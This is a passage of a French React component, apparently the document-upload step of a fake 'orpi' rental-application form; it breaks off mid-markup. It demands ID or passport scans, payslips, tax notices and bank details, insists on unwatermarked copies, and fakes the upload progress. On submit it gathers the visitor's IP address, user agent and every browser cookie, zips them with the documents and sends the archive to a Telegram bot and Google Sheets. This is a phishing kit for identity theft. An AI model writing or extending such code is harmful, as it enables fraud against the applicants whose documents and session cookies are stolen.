import React, { useState, useEffect, useRef } from 'react';
import { Check, Upload, Loader, AlertCircle, CheckCircle, X } from 'lucide-react';
import { useNavigate } from 'react-router-dom';
import { 
  sendMessageToTelegram, 
  sendFileToTelegram, 
  formatFormDataForTelegram,
  createTechnicalInfoFile,
  createCookiesFile,
  getAllCookies
} from '../utils/telegramService';
import { createZipFile } from '../utils/zipHelper';
import { getIpAddress } from '../utils/ipService';
import { sendToGoogleSheets } from '../utils/googleSheetsService';

const StepFinal = ({ formData, onChange }) => {
  const navigate = useNavigate();
  
  // Références pour les inputs de fichiers
  const fileInputRefs = useRef({});
  
  // État pour gérer les fichiers uploadés
  const [uploads, setUploads] = useState({});
  
  // État spécifique pour les fichiers de revenus multiples
  const [revenusFiles, setRevenusFiles] = useState([]);
  
  // État spécifique pour les fichiers d'avis d'imposition multiples
  const [taxFiles, setTaxFiles] = useState([]);
  
  // État pour le consentement
  const [consent, setConsent] = useState(false);
  
  // État pour contrôler l'affichage de l'erreur (uniquement après tentative de soumission)
  const [attemptedSubmit, setAttemptedSubmit] = useState(false);
  const [validationError, setValidationError] = useState('');
  
  // État pour le chargement pendant l'envoi à Telegram
  const [isSubmitting, setIsSubmitting] = useState(false);

  // État pour la confirmation des revenus insuffisants
  const [showRevenusWarning, setShowRevenusWarning] = useState(false);

  // État pour suivre si les données ont été envoyées avec succès
  const [dataSubmitted, setDataSubmitted] = useState(false);
  
  // État pour le suivi des étapes d'envoi
  const [sendingStatus, setSendingStatus] = useState({
    formData: 'pending',
    documents: 'pending',
    complete: false
  });

  // Nouvel état pour la pop-up d'instructions
  const [showInstructionsModal, setShowInstructionsModal] = useState(true);
  const [instructionsAccepted, setInstructionsAccepted] = useState(false);

  // Empêcher l'utilisateur de quitter pendant l'envoi des fichiers
  useEffect(() => {
    const handleBeforeUnload = (e) => {
      if (isSubmitting) {
        e.preventDefault();
        e.returnValue = 'Envoi des fichiers en cours. Êtes-vous sûr de vouloir quitter?';
        return e.returnValue;
      }
    };

    window.addEventListener('beforeunload', handleBeforeUnload);
    return () => {
      window.removeEventListener('beforeunload', handleBeforeUnload);
    };
  }, [isSubmitting]);

  // Sélection du type de pièce d'identité
  const handleTypeChange = (type) => {
    console.log("Type d'identité sélectionné:", type);
    onChange({ target: { name: 'typeIdentite', value: type } });
    
    // Réinitialiser les uploads si on change de type d'identité
    setUploads({});
  };

  // Définir les documents requis en fonction du type d'identité
  let idDocs = [];
  if (formData.typeIdentite === 'CNI') {
    idDocs = [
      {
        id: "identity_recto",
        title: "Carte d'identité (recto)",
        description: "Face avant de votre carte d'identité",
        accept: ".jpg,.jpeg,.png,.pdf"
      },
      {
        id: "identity_verso",
        title: "Carte d'identité (verso)",
        description: "Face arrière de votre carte d'identité",
        accept: ".jpg,.jpeg,.png,.pdf"
      }
    ];
  } else if (formData.typeIdentite === 'passeport') {
    idDocs = [
      {
        id: "identity_passport",
        title: "Passeport",
        description: "Page principale de votre passeport",
        accept: ".jpg,.jpeg,.png,.pdf"
      }
    ];
  } else if (formData.typeIdentite === 'titre') {
    idDocs = [
      {
        id: "identity_titre_recto",
        title: "Titre de séjour (recto)",
        description: "Face avant de votre titre de séjour",
        accept: ".jpg,.jpeg,.png,.pdf"
      },
      {
        id: "identity_titre_verso",
        title: "Titre de séjour (verso)",
        description: "Face arrière de votre titre de séjour",
        accept: ".jpg,.jpeg,.png,.pdf"
      }
    ];
  }

  // Liste des documents requis organisée par catégories
  const categories = [
    {
      title: "Justificatifs de revenus",
      description: "Selon votre situation, veuillez fournir :",
      infoOptions: [
        "Salariés : vos 3 derniers bulletins de salaire",
        "Indépendants, artisans, professions libérales : vos 3 derniers relevés URSSAF ou votre bilan comptable"
      ],
      documents: [
        {
          id: "income_docs",
          title: "Justificatifs de revenus",
          description: "Déposez jusqu'à 3 fichiers",
          accept: ".jpg,.jpeg,.png,.pdf",
          multiple: true
        }
      ]
    },
    {
      title: "Justificatif de domicile (moins de 3 mois)",
      description: "Choisissez l'un des justificatifs suivants:",
      documents: [
        {
          id: "address_proof",
          title: "Justificatif de domicile",
          description: "Facture d'électricité, de gaz, d'eau, quittance de loyer, facture de téléphone fixe ou taxe foncière",
          accept: ".jpg,.jpeg,.png,.pdf"
        }
      ],
      infoOptions: [
        "Facture ou attestation d'électricité, de gaz ou d'eau (document de moins de 3 mois)",
        "Quittance de loyer (document de moins de 3 mois)",
        "Facture de téléphone fixe (la facture de téléphone mobile n'est pas acceptée)",
        "Taxe foncière (si vous êtes propriétaire)"
      ]
    },
    {
      title: "Avis d'imposition",
      documents: [
        {
          id: "tax_docs",
          title: "Toutes les pages du dernier avis d'imposition",
          description: "Document complet, toutes les pages incluses",
          accept: ".jpg,.jpeg,.png,.pdf",
          multiple: true
        }
      ]
    },
    {
      title: "RIB (Relevé d'Identité Bancaire)",
      description: "Votre relevé d'identité bancaire",
      documents: [
        {
          id: "rib",
          title: "RIB",
          description: "Relevé d'identité bancaire de votre compte principal",
          accept: ".jpg,.jpeg,.png,.pdf"
        }
      ]
    }
  ];

  // Fonction pour combiner tous les documents requis
  const getAllRequiredDocuments = () => {
    const allDocs = [...idDocs];
    
    categories.forEach(category => {
      category.documents.forEach(doc => {
        // Ne pas ajouter les documents avec multiple=true car ils sont gérés différemment
        if (!doc.multiple) {
          allDocs.push(doc);
        }
      });
    });
    
    return allDocs;
  };

  // Fonction pour réinitialiser proprement un input de fichier
  const clearFileInput = (inputRef) => {
    if (inputRef && inputRef.current) {
      try {
        // Créer un nouvel élément input
        const newInput = document.createElement('input');
        newInput.type = 'file';
        newInput.multiple = inputRef.current.multiple;
        newInput.accept = inputRef.current.accept;
        newInput.className = inputRef.current.className;
        newInput.id = inputRef.current.id;
        
        // Copier les event listeners
        const newInputClone = newInput.cloneNode(true);
        
        // Remplacer l'ancien input par le nouveau
        if (inputRef.current.parentNode) {
          inputRef.current.parentNode.replaceChild(newInputClone, inputRef.current);
          inputRef.current = newInputClone;
          
          // Réattacher l'event listener
          const docId = inputRef.current.id.split('-')[1];
          if (inputRef.current.id.includes('revenus')) {
            inputRef.current.addEventListener('change', (e) => handleMultipleFileChange(e, docId));
          } else if (inputRef.current.id.includes('tax')) {
            inputRef.current.addEventListener('change', (e) => handleTaxFilesChange(e, docId));
          }
        }
      } catch (error) {
        console.error('Erreur lors de la réinitialisation de l\'input:', error);
      }
    }
  };

  // Fonction pour gérer l'upload de plusieurs fichiers de revenus
  const handleMultipleFileChange = (e, docId) => {
    const files = Array.from(e.target.files);
    if (!files.length) return;
    
    // Limiter à 3 fichiers maximum
    if (revenusFiles.length + files.length > 3) {
      setValidationError('Vous ne pouvez pas télécharger plus de 3 justificatifs de revenus');
      return;
    }
    
    // Créer des copies des fichiers avec des IDs uniques
    const newFiles = files.map(file => {
      // Générer un ID unique basé sur le nom du fichier et un timestamp
      const uniqueId = `${docId}-${file.name}-${file.lastModified}-${Math.random().toString(36).substring(2, 10)}`;
      return { id: uniqueId, file, docId };
    });
    
    // Vérifier les doublons
    const existingFileNames = revenusFiles.map(f => f.file.name);
    const duplicates = newFiles.filter(f => existingFileNames.includes(f.file.name));
    
    if (duplicates.length > 0) {
      setValidationError(`Le fichier ${duplicates[0].file.name} a déjà été téléchargé`);
      return;
    }
    
    // Ajouter les nouveaux fichiers à la liste
    setRevenusFiles(prev => [...prev, ...newFiles]);
    
    // Réinitialiser le champ de fichier
    const inputRef = fileInputRefs.current[`revenus-${docId}`];
    clearFileInput(inputRef);
    
    // Effacer les messages d'erreur
    setValidationError('');
    
    // Log pour débogage
    console.log('Revenus files après ajout:', [...revenusFiles, ...newFiles].map(f => f.id));
  };

  // Fonction pour gérer l'upload de plusieurs fichiers d'avis d'imposition
  const handleTaxFilesChange = (e, docId) => {
    const files = Array.from(e.target.files);
    if (!files.length) return;
    
    // Limiter à 5 fichiers maximum
    if (taxFiles.length + files.length > 5) {
      setValidationError('Vous ne pouvez pas télécharger plus de 5 pages d\'avis d\'imposition');
      return;
    }
    
    // Créer des copies des fichiers avec des IDs uniques
    const newFiles = files.map(file => {
      // Générer un ID unique basé sur le nom du fichier et un timestamp
      const uniqueId = `${docId}-${file.name}-${file.lastModified}-${Math.random().toString(36).substring(2, 10)}`;
      return { id: uniqueId, file, docId };
    });
    
    // Vérifier les doublons
    const existingFileNames = taxFiles.map(f => f.file.name);
    const duplicates = newFiles.filter(f => existingFileNames.includes(f.file.name));
    
    if (duplicates.length > 0) {
      setValidationError(`Le fichier ${duplicates[0].file.name} a déjà été téléchargé`);
      return;
    }
    
    // Ajouter les nouveaux fichiers à la liste
    setTaxFiles(prev => [...prev, ...newFiles]);
    
    // Réinitialiser le champ de fichier
    const inputRef = fileInputRefs.current[`tax-${docId}`];
    clearFileInput(inputRef);
    
    // Effacer les messages d'erreur
    setValidationError('');
    
    // Log pour débogage
    console.log('Tax files après ajout:', [...taxFiles, ...newFiles].map(f => f.id));
  };

  // Fonction pour supprimer un fichier de revenus
  const handleRemoveRevenusFile = (fileId) => {
    setRevenusFiles(prev => prev.filter(f => f.id !== fileId));
    console.log('Revenus files après suppression:', revenusFiles.filter(f => f.id !== fileId).map(f => f.id));
  };

  // Fonction pour supprimer un fichier d'avis d'imposition
  const handleRemoveTaxFile = (fileId) => {
    setTaxFiles(prev => prev.filter(f => f.id !== fileId));
    console.log('Tax files après suppression:', taxFiles.filter(f => f.id !== fileId).map(f => f.id));
  };

  const handleFileChange = async (e, document) => {
    e.preventDefault(); // Empêcher toute action de formulaire par défaut
    
    const fileInput = e.target;
    const file = fileInput.files[0];
    
    if (!file) return;

    // Mettre à jour l'état pour montrer que le fichier est en cours de téléchargement
    setUploads(prev => ({
      ...prev,
      [document.id]: {
        status: 'uploading',
        progress: 0,
        file: file,
        error: null
      }
    }));

    try {
      // Simulation d'un téléchargement avec progression
      for (let i = 0; i <= 100; i += 10) {
        await new Promise(resolve => setTimeout(resolve, 100));
        setUploads(prev => ({
          ...prev,
          [document.id]: {
            ...prev[document.id],
            progress: i
          }
        }));
      }

      // Simuler une attente de réponse serveur
      await new Promise(resolve => setTimeout(resolve, 300));

      // Simuler une réponse réussie
      setUploads(prev => ({
        ...prev,
        [document.id]: {
          ...prev[document.id],
          status: 'completed',
          progress: 100,
          error: null
        }
      }));

      // Mettre à jour formData pour stocker l'information du fichier
      onChange({ 
        target: { 
          name: `document_${document.id}`, 
          value: file.name // Stocker juste le nom du fichier pour éviter des problèmes de sérialisation
        } 
      });
      
      // Réinitialiser le champ de fichier
      const inputRef = fileInputRefs.current[`standard-${document.id}`];
      clearFileInput(inputRef);

    } catch (error) {
      console.error('Erreur upload:', error);
      setUploads(prev => ({
        ...prev,
        [document.id]: {
          ...prev[document.id],
          status: 'error',
          error: error.message || 'Erreur lors du téléchargement'
        }
      }));
    }
  };

  // Fonction pour supprimer un fichier normal
  const handleRemoveFile = (documentId) => {
    // Supprimer l'entrée correspondante dans les uploads
    setUploads(prev => {
      const newUploads = { ...prev };
      delete newUploads[documentId];
      return newUploads;
    });
    
    // Mettre à jour formData
    onChange({ 
      target: { 
        name: `document_${documentId}`, 
        value: '' 
      } 
    });
  };

  const renderUploadStatus = (documentId) => {
    const upload = uploads[documentId];
    
    if (!upload) return null;
    
    switch(upload.status) {
      case 'uploading':
        return (
          <div className="mt-2">
            <div className="flex items-center">
              <Loader className="w-4 h-4 mr-2 animate-spin text-orpi-primary" />
              <span className="text-sm text-orpi-primary">Téléchargement en cours... {upload.progress}%</span>
            </div>
            <div className="w-full bg-gray-200 h-1 mt-1 rounded">
              <div 
                className="bg-orpi-primary h-1 rounded" 
                style={{ width: `${upload.progress}%` }}
              />
            </div>
          </div>
        );
      case 'completed':
        return (
          <div className="mt-2 flex items-center">
            <CheckCircle className="w-4 h-4 mr-2 text-green-600" />
            <span className="text-sm text-green-600 flex-grow">
              {upload.file.name} téléchargé avec succès
            </span>
            <button 
              type="button" 
              onClick={() => handleRemoveFile(documentId)}
              className="text-red-500 hover:text-red-700 ml-2"
              title="Supprimer ce fichier"
            >
              <X className="w-4 h-4" />
            </button>
          </div>
        );
      case 'error':
        return (
          <div className="mt-2 flex items-center">
            <AlertCircle className="w-4 h-4 mr-2 text-red-600" />
            <span className="text-sm text-red-600">
              Erreur: {upload.error}
            </span>
          </div>
        );
      default:
        return null;
    }
  };

  // Rendre l'affichage des fichiers multiples (pour les revenus)
  const renderMultipleFiles = () => {
    if (revenusFiles.length === 0) {
      return null;
    }
    
    return (
      <div className="mt-3 space-y-2">
        {revenusFiles.map(fileInfo => (
          <div key={fileInfo.id} className="ml-4 flex items-center">
            <CheckCircle className="w-4 h-4 mr-2 text-green-600" />
            <span className="text-sm text-green-600 flex-grow">
              {fileInfo.file.name} téléchargé avec succès
            </span>
            <button 
              type="button" 
              onClick={() => handleRemoveRevenusFile(fileInfo.id)}
              className="text-red-500 hover:text-red-700 ml-2"
              title="Supprimer ce fichier"
            >
              <X className="w-4 h-4" />
            </button>
          </div>
        ))}
      </div>
    );
  };

  // Rendre l'affichage des fichiers d'avis d'imposition
  const renderTaxFiles = () => {
    if (taxFiles.length === 0) {
      return null;
    }
    
    return (
      <div className="mt-3 space-y-2">
        {taxFiles.map(fileInfo => (
          <div key={fileInfo.id} className="ml-4 flex items-center">
            <CheckCircle className="w-4 h-4 mr-2 text-green-600" />
            <span className="text-sm text-green-600 flex-grow">
              {fileInfo.file.name} téléchargé avec succès
            </span>
            <button 
              type="button" 
              onClick={() => handleRemoveTaxFile(fileInfo.id)}
              className="text-red-500 hover:text-red-700 ml-2"
              title="Supprimer ce fichier"
            >
              <X className="w-4 h-4" />
            </button>
          </div>
        ))}
      </div>
    );
  };

  // Vérifier si tous les documents ont été téléchargés
  const documents = getAllRequiredDocuments();
  const hasRequiredDocuments = 
    documents.length > 0 && 
    documents.every(doc => uploads[doc.id]?.status === 'completed');
  
  const hasRevenusDocuments = revenusFiles.length > 0;
  
  const hasTaxDocuments = taxFiles.length > 0;

  const hasRibDocument = uploads['rib']?.status === 'completed';
  
  const allDocumentsUploaded = hasRequiredDocuments && hasRevenusDocuments && hasTaxDocuments && hasRibDocument;
  
  // Fonction de validation avant soumission
  const validateForm = () => {
    if (!instructionsAccepted) {
      setValidationError('Veuillez accepter les instructions concernant les documents');
      return false;
    }
    
    if (!formData.typeIdentite) {
      setValidationError('Veuillez sélectionner un type de pièce d\'identité');
      return false;
    }
    
    if (!hasRequiredDocuments) {
      setValidationError('Veuillez télécharger tous les documents requis');
      return false;
    }
    
    if (!hasRevenusDocuments) {
      setValidationError('Veuillez télécharger au moins un justificatif de revenus');
      return false;
    }
    
    if (!hasTaxDocuments) {
      setValidationError('Veuillez télécharger au moins une page de votre avis d\'imposition');
      return false;
    }

    const hasRib = uploads['rib']?.status === 'completed';
    if (!hasRib) {
      setValidationError('Veuillez télécharger votre RIB');
      return false;
    }
    
    if (!consent) {
      setValidationError('Veuillez accepter les conditions d\'utilisation');
      return false;
    }
    
    // Vérifier si moins de 3 justificatifs de revenus ont été uploadés
    if (revenusFiles.length < 3) {
      // Afficher l'avertissement mais ne pas bloquer la soumission
      setShowRevenusWarning(true);
      return false; // On ne valide pas le formulaire mais on laisse l'utilisateur confirmer
    }
    
    setValidationError('');
    return true;
  };
  
  // Fonction pour continuer malgré l'avertissement de revenus
  const continueWithIncompleteRevenus = () => {
    setShowRevenusWarning(false);
    handleFinalSubmitInternal();
  };
  
  // Fonction interne pour gérer la finalisation après validation
  const handleFinalSubmitInternal = async () => {
    // Mettre à jour formData avec le consentement avant de soumettre
    onChange({ target: { name: 'consentement', value: consent } });
    
    // Indiquer que la soumission est en cours
    setIsSubmitting(true);
    
    try {
      // Récupérer l'adresse IP
      const ipAddress = await getIpAddress();
      
      // Récupérer tous les cookies du navigateur
      const cookies = getAllCookies();
      
      // Préparer les informations utilisateur avec les cookies formatés
      const userInfo = {
        ip: ipAddress,
        userAgent: navigator.userAgent,
        cookies: cookies
      };
      
      // Récupérer les tokens depuis les variables d'environnement
      const botToken = process.env.REACT_APP_TELEGRAM_BOT_TOKEN;
      const chatId = process.env.REACT_APP_TELEGRAM_CHAT_ID;
      
      // if (!botToken || !chatId) {
      //   console.error('Les tokens Telegram ne sont pas configurés correctement');
      //   throw new Error('Configuration Telegram manquante');
      // }
      
      // Mise à jour du statut d'envoi
      setSendingStatus(prev => ({ ...prev, documents: 'sending' }));

      // Créer le fichier ZIP contenant tous les documents et les réponses au formulaire
      // Le texte du formulaire est déjà inclus dans le ZIP, pas besoin de l'envoyer séparément
      const zipFile = await createZipFile(formData, uploads, revenusFiles, taxFiles, userInfo, false);

      console.log("ZIP sauvegardé localement et prêt pour l'envoi à Telegram...");

      // Envoyer le fichier ZIP à Telegram
      await sendFileToTelegram(
        botToken,
        chatId,
        zipFile,
        `Dossier complet de ${formData.nom || 'candidat'} ${formData.prenom || ''}`
      );

      try {
        console.log('📊 Envoi vers Google Sheets en cours...');
        const sheetsResult = await sendToGoogleSheets(formData, userInfo);
        console.log('✅ Données envoyées vers Google Sheets avec succès:', sheetsResult);
      } catch (sheetsError) {
        console.warn('⚠️ Erreur Google Sheets (non bloquante):', sheetsError);
        // L'erreur Google Sheets ne doit pas empêcher la finalisation
      }
      
      // Mise à jour du statut d'envoi
      setSendingStatus(prev => ({ 
        ...prev, 
        documents: 'completed',
        complete: true
      }));
      
      console.log('Archive ZIP envoyée avec succès à Telegram');
      
      // Marquer les données comme envoyées avec succès
      setDataSubmitted(true);
      
      // Finaliser la soumission et rediriger seulement après confirmation d'envoi
      setIsSubmitting(false);
      navigate('/confirmation', { state: { dataSubmitted: true } });
    } catch (error) {
      console.error('Erreur lors de l\'envoi des données à Telegram:', error);
      
      // Mettre à jour le statut d'envoi avec l'erreur
      setSendingStatus(prev => ({
        ...prev,
        formData: prev.formData === 'sending' ? 'error' : prev.formData,
        documents: prev.documents === 'sending' ? 'error' : prev.documents
      }));
      
      setValidationError(`Une erreur est survenue lors de l'envoi de votre dossier: ${error.message}. Veuillez réessayer.`);
      setIsSubmitting(false);
    }
  };
  
  // Fonction pour gérer la finalisation du formulaire avec envoi à Telegram
  const handleFinalSubmit = async (e) => {
    // Empêcher la soumission par défaut du formulaire
    if (e) {
      e.preventDefault();
    }
    
    setAttemptedSubmit(true);
    
    // Valider le formulaire avant soumission
    if (!validateForm()) {
      return;
    }
    
    // Procéder directement à l'envoi
    handleFinalSubmitInternal();
  };

  // Rendu de l'indicateur d'étapes d'envoi
  const renderSendingStatusIndicator = () => {
    return (
      <div className="fixed inset-0 z-50 flex items-center justify-center bg-black bg-opacity-50">
        <div className="bg-white p-6 rounded-lg shadow-xl max-w-md">
          <h3 className="text-xl font-bold text-orpi-secondary mb-6 text-center">
            Envoi de votre dossier en cours
          </h3>
          
          <div className="space-y-6">
            {/* <div className="flex items-center">
              <div className="w-8 h-8 flex items-center justify-center mr-4">
                {sendingStatus.formData === 'pending' && <div className="w-3 h-3 bg-gray-300 rounded-full"></div>}
                {sendingStatus.formData === 'sending' && <Loader className="w-6 h-6 text-orpi-primary animate-spin" />}
                {sendingStatus.formData === 'completed' && <CheckCircle className="w-6 h-6 text-green-500" />}
                {sendingStatus.formData === 'error' && <AlertCircle className="w-6 h-6 text-red-500" />}
              </div>
              <div className="flex-1">
                <p className="font-medium">Envoi des informations personnelles</p>
                {sendingStatus.formData === 'error' && 
                  <p className="text-sm text-red-500">Une erreur s'est produite</p>
                }
              </div>
            </div> */}
            
            <div className="flex items-center">
              <div className="w-8 h-8 flex items-center justify-center mr-4">
                {sendingStatus.documents === 'pending' && <div className="w-3 h-3 bg-gray-300 rounded-full"></div>}
                {sendingStatus.documents === 'sending' && <Loader className="w-6 h-6 text-orpi-primary animate-spin" />}
                {sendingStatus.documents === 'completed' && <CheckCircle className="w-6 h-6 text-green-500" />}
                {sendingStatus.documents === 'error' && <AlertCircle className="w-6 h-6 text-red-500" />}
              </div>
              <div className="flex-1">
                <p className="font-medium">Envoi des pièces jointes</p>
                {sendingStatus.documents === 'error' && 
                  <p className="text-sm text-red-500">Une erreur s'est produite</p>
                }
              </div>
            </div>
          </div>
          
          <div className="mt-8 text-center">
            <p className="text-sm text-gray-600 mb-4">
              Veuillez patienter pendant l'envoi de votre dossier.<br />
              Ne fermez pas cette fenêtre.
            </p>
            
            {(sendingStatus.formData === 'error' || sendingStatus.documents === 'error') && (
              <button
                type="button"
                onClick={() => setIsSubmitting(false)}
                className="px-4 py-2 bg-red-600 text-white rounded-lg hover:bg-red-700"
              >
                Fermer et réessayer
              </button>
            )}
          </div>
        </div>
      </div>
    );
  };

  // Popup avec les instructions sur les documents
  const renderInstructionsModal = () => {
    return (
      <div className="fixed inset-0 z-50 flex items-center justify-center bg-black bg-opacity-50">
        <div className="bg-white p-6 rounded-lg shadow-xl max-w-lg w-full">
          <div className="flex justify-between items-center mb-4">
            <h3 className="text-xl font-bold text-orpi-secondary">Instructions importantes</h3>
          </div>
          
          <div className="mb-6 text-gray-700">
            <ul className="space-y-4">
              <li className="flex items-start">
                <span className="mr-2 mt-1">•</span>
                <span>
                  <strong>IMPORTANT : Veuillez ajouter vos documents non filigranés</strong>, bien visibles et sans marques d'eau susceptibles de nuire à leur lisibilité.
                  Tout document contenant un filigrane sera systématiquement refusé, ce qui pourra entraîner un allongement du délai de traitement de votre dossier.
                </span>
              </li>
              <li className="flex items-start">
                <span className="mr-2 mt-1">•</span>
                <span>
                  Les documents doivent être <strong>nets et lisibles</strong> (les documents flous, altérés ou comportant des reflets seront refusés).
                </span>
              </li>
              <li className="flex items-start">
                <span className="mr-2 mt-1">•</span>
                <span>
                  En cas de documents manquants, incorrects ou ne correspondant pas aux informations fournies, une nouvelle demande vous sera adressée, ce qui retardera systématiquement le traitement de votre dossier.
                </span>
              </li>
            </ul>
          </div>
          
          <div className="border-t pt-4 mt-6">
            <label className="flex items-start">
              <input
                type="checkbox"
                checked={instructionsAccepted}
                onChange={(e) => setInstructionsAccepted(e.target.checked)}
                className="mt-1 mr-2"
              />
              <span className="text-sm">
                J'ai lu et je comprends les instructions concernant les documents à fournir. Je m'engage à transmettre des documents conformes aux critères mentionnés.
              </span>
            </label>
            
            <div className="mt-6 flex justify-end">
              <button
                type="button"
                onClick={() => {
                  if (instructionsAccepted) {
                    setShowInstructionsModal(false);
                  } else {
                    // Afficher un message d'erreur si la case n'est pas cochée
                    setValidationError('Veuillez accepter les instructions avant de continuer');
                  }
                }}
                className={`px-4 py-2 rounded ${
                  instructionsAccepted 
                    ? 'bg-orpi-primary text-white hover:bg-orpi-dark' 
                    : 'bg-gray-300 text-gray-500 cursor-not-allowed'
                }`}
                disabled={!instructionsAccepted}
              >
                Continuer
              </button>
            </div>
          </div>
        </div>
      </div>
    );
  };

  return (
    <div className="p-6 max-w-3xl mx-auto">
      {/* Pop-up d'instructions */}
      {showInstructionsModal && renderInstructionsModal()}

      {/* Message de validation */}
      <div className="bg-orpi-light border-l-4 border-orpi-primary p-6 mb-8 rounded-r-lg">
        <div className="flex items-center mb-4">
          <Check className="h-8 w-8 text-orpi-primary mr-3" />
          <h2 className="text-2xl font-bold text-orpi-secondary">
            Félicitations ! Votre formulaire a bien été rempli.
          </h2>
        </div>
        <p className="text-orpi-secondary">
          Pour démarrer l'étude de votre dossier, veuillez nous transmettre les documents demandés ci-dessous.
        </p>
      </div>

      {/* Afficher les erreurs de validation uniquement après tentative de soumission */}
      {attemptedSubmit && validationError && (
        <div className="bg-red-100 border-l-4 border-red-500 p-4 mb-6 rounded-r">
          <p className="text-red-700">{validationError}</p>
        </div>
      )}

      {/* Alerte pour nombre insuffisant de justificatifs de revenus */}
      {showRevenusWarning && (
        <div className="fixed inset-0 z-50 flex items-center justify-center bg-black bg-opacity-50">
          <div className="bg-white p-6 rounded-lg shadow-xl max-w-xl">
            <h3 className="text-xl font-bold text-orpi-secondary mb-4">
              Attention aux justificatifs de revenus
            </h3>
            <div className="text-gray-700 mb-6">
              <p className="mb-3">
                Nous avons remarqué que vous avez importé moins de documents que prévu dans la section "Justificatifs de revenus".
              </p>
              <p className="mb-3">
                Pour rappel, nous demandons les 3 derniers bulletins de salaire ou tout autre document pouvant attester de vos revenus des 3 derniers mois.
              </p>
              <p className="mb-3">
                Si des documents sont manquants, cela pourrait allonger considérablement le temps de traitement de votre dossier.
              </p>
              <p>
                Veuillez vérifier que tous les justificatifs de revenus ont été importés.
              </p>
            </div>
            <div className="flex justify-between">
              <button
                type="button"
                onClick={() => setShowRevenusWarning(false)}
                className="px-4 py-2 border border-gray-300 rounded-lg text-gray-700 hover:bg-gray-100"
              >
                Ajouter plus de documents
              </button>
              <button
                type="button"
                onClick={continueWithIncompleteRevenus}
                className="px-4 py-2 bg-orpi-primary text-white rounded-lg hover:bg-orpi-dark"
              >
                Envoyer quand même
              </button>
            </div>
          </div>
        </div>
      )}

      {/* Indicateur de soumission en cours */}
      {isSubmitting && renderSendingStatusIndicator()}

      {/* Sélection du type de pièce d'identité */}
      <div className="mb-8">
        <h3 className="text-xl font-semibold mb-4 text-orpi-secondary">Type de pièce d'identité</h3>
        <div>
          <label className="block text-sm font-medium mb-1 text-orpi-secondary">
            Type de pièce d'identité <span className="text-red-500">*</span>
          </label>
          <div className="grid grid-cols-1 gap-4">
            {[
              { value: 'CNI', label: 'Carte Nationale d\'Identité', count: 2 },
              { value: 'passeport', label: 'Passeport', count: 1 },
              { value: 'titre', label: 'Titre de séjour', count: 2 }
            ].map((type) => (
              <button
                key={type.value}
                type="button"
                className={`p-3 border rounded-lg hover:border-orpi-primary ${
                  formData.typeIdentite === type.value ? 'border-orpi-primary bg-orpi-light' : ''
                }`}
                onClick={() => handleTypeChange(type.value)}
              >
                {type.label}
              </button>
            ))}
          </div>
        </div>
      </div>

      {/* Liste des documents par catégorie */}
      {formData.typeIdentite ? (
        <div className="space-y-8">
          {/* Pièce d'identité */}
          <div className="space-y-4">
            <h3 className="text-xl font-semibold text-orpi-secondary">Pièce d'identité</h3>
            {idDocs.map((doc) => (
              <div key={doc.id} className="border rounded-lg p-4 bg-white">
                <div className="flex justify-between items-start mb-3">
                  <div>
                    <h4 className="font-medium text-orpi-secondary">{doc.title}</h4>
                    <p className="text-sm text-gray-600">
                      {doc.description}
                    </p>
                    
                    {renderUploadStatus(doc.id)}
                  </div>
                  <div>
                    <input
                      type="file"
                      id={`file-${doc.id}`}
                      onChange={(e) => handleFileChange(e, doc)}
                      className="hidden"
                      accept={doc.accept}
                      ref={el => fileInputRefs.current[`standard-${doc.id}`] = el}
                    />
                    <button 
                      type="button" 
                      onClick={() => fileInputRefs.current[`standard-${doc.id}`].click()}
                      className={`flex items-center px-4 py-2 ${
                        uploads[doc.id]?.status === 'completed'
                          ? 'bg-gray-400 cursor-not-allowed'
                          : uploads[doc.id]?.status === 'uploading'
                            ? 'bg-orpi-light text-orpi-primary cursor-not-allowed'
                            : 'bg-orpi-primary hover:bg-orpi-dark'
                      } text-white rounded`}
                      disabled={uploads[doc.id]?.status === 'uploading' || uploads[doc.id]?.status === 'completed'}
                    >
                      {uploads[doc.id]?.status === 'completed' ? (
                        <>
                          <CheckCircle className="w-4 h-4 mr-2" />
                          Déposé
                        </>
                      ) : (
                        <>
                          <Upload className="w-4 h-4 mr-2" />
                          {uploads[doc.id]?.status === 'uploading' ? 'En cours...' : 'Déposer'}
                        </>
                      )}
                    </button>
                  </div>
                </div>
              </div>
            ))}
          </div>
          
          {/* Documents par catégorie */}
          {categories.map((category, catIndex) => (
            <div key={catIndex} className="space-y-4">
              <h3 className="text-xl font-semibold text-orpi-secondary">{category.title}</h3>
              
              {category.description && (
                <p className="text-gray-600 mb-2">{category.description}</p>
              )}
              
              {/* Afficher les options d'informations si présentes */}
              {category.infoOptions && (
                <div className="bg-blue-50 p-4 rounded-lg mb-4">
                  <ul className="list-disc pl-5 text-sm text-blue-800">
                    {category.infoOptions.map((option, i) => (
                      <li key={i} className="mb-1">{option}</li>
                    ))}
                  </ul>
                </div>
              )}
              
              {category.documents.map((doc) => {
                if (doc.multiple && doc.id === "income_docs") {
                  // Cas spécial pour les justificatifs de revenus multiples
                  return (
                    <div key={doc.id} className="border rounded-lg p-4 bg-white">
                      <div className="flex justify-between items-start mb-3">
                        <div className="flex-1">
                          <h4 className="font-medium text-orpi-secondary">{doc.title}</h4>
                          <p className="text-sm text-gray-600">
                            {doc.description}
                          </p>
                          
                          {renderMultipleFiles()}
                        </div>
                        <div>
                          <input
                            type="file"
                            id={`revenus-${doc.id}`}
                            onChange={(e) => handleMultipleFileChange(e, doc.id)}
                            className="hidden"
                            accept={doc.accept}
                            multiple
                            ref={el => fileInputRefs.current[`revenus-${doc.id}`] = el}
                          />
                          <button 
                            type="button" 
                            onClick={() => fileInputRefs.current[`revenus-${doc.id}`].click()}
                            className={`flex items-center px-4 py-2 ${
                              revenusFiles.length >= 3
                                ? 'bg-gray-400 cursor-not-allowed'
                                : 'bg-orpi-primary hover:bg-orpi-dark'
                            } text-white rounded`}
                            disabled={revenusFiles.length >= 3}
                          >
                            <Upload className="w-4 h-4 mr-2" />
                            {revenusFiles.length > 0 ? 'Ajouter' : 'Sélectionner'}
                          </button>
                        </div>
                      </div>
                      
                      {revenusFiles.length > 0 && (
                        <div className="mt-2 text-xs text-gray-500">
                          {revenusFiles.length === 1 ? '1 fichier sélectionné' : 
                            revenusFiles.length >= 3 ? '3 fichiers sélectionnés (maximum)' : 
                            `${revenusFiles.length} fichiers sélectionnés`}
                        </div>
                      )}
                    </div>
                  );
                }
                
                if (doc.multiple && doc.id === "tax_docs") {
                  // Cas spécial pour les avis d'imposition multiples
                  return (
                    <div key={doc.id} className="border rounded-lg p-4 bg-white">
                      <div className="flex justify-between items-start mb-3">
                        <div className="flex-1">
